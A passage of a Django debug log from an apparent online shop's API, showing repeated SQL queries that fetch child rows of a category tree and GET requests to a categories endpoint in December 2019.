"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:31:00,365 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:31:00,367 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:31:00,371 utils 2749 140297243715328 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:31:00,375 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:31:00,377 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:31:00,379 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:31:00,382 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:31:00,384 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:31:00,387 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:31:00,390 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:31:00,392 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:31:00,395 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:31:00,398 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:31:00,400 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:31:00] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:31:05,820 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:31:05,826 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:31:05,831 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:31:05,833 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:31:05,837 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:31:05,839 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:31:05,842 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:31:05,844 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:31:05,846 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:31:05,849 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:31:05,852 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:31:05,854 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:31:05,856 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:31:05,859 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:31:05,862 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:31:05,864 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:31:05,866 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:31:05,869 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:31:05,871 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:31:05,877 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:31:05,879 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:31:05,881 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:31:05,883 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:31:05,886 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:31:05,888 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:31:05,891 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:31:05,893 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:31:05,896 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:31:05,899 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:31:05,901 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:31:05,905 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:31:05,907 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:31:05,909 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:31:05,911 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:31:05,913 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:31:05,917 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:31:05,919 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:31:05,921 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:31:05,924 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:31:05,926 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:31:05,928 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:31:05,931 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:31:05,933 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:31:05,935 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:31:05,938 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:31:05,940 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:31:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:31:09,664 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 09:31:09,672 utils 2749 140297243715328 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [27/Dec/2019 09:31:09] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 09:31:09,693 utils 2749 140297254205184 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:31:09,704 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:31:09,710 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:31:09,714 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:31:09,720 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 